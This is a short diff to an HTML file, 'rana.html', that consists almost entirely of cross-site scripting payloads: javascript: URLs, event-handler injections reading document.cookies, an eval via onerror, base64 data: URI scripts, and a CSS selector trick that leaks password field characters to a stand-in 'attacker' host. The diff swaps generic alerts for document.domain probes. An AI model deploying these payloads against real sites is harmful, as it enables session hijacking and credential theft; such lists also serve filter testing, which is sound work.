--- a/rana.html
+++ b/rana.html
@@ -1,11 +1,11 @@
 <img/src="mars.png"alt="mars">
 <object><param name="src" value= "javascript:alert(document.domain)"></param></object> 
-<isindex type=image src=1 onload=alert(document.cookies)> <isindex action=javascript:alert(1) type=image> 
+<isindex type=image src=1 onload=alert(document.cookies)> <isindex action=javascript:alert(document.domain) type=image> 
 <img src=x:alert(alt) onerror=eval(src) alt=document.cookies> 
 <x:script xmlns:x="http://www.w3.org/1999/ xhtml">alert('xss');</x:script> 
 </a onmousemove="alert(1)"> 
 <style>input[name=password][value*=a]{ background:url('//attacker?log[]=a'); }</style> <iframe seamless src=”login.asp”/> 
-data:text/html,<script>alert(0)</script> data:text/html;base64, PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==
+data:text/html,<script>alert(document.domain)</script> data:text/html;base64, PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==
 <img  src="x:?  title="  onerror=alert(1)//"> 
 <script>alert(document.cookies);</script>
 
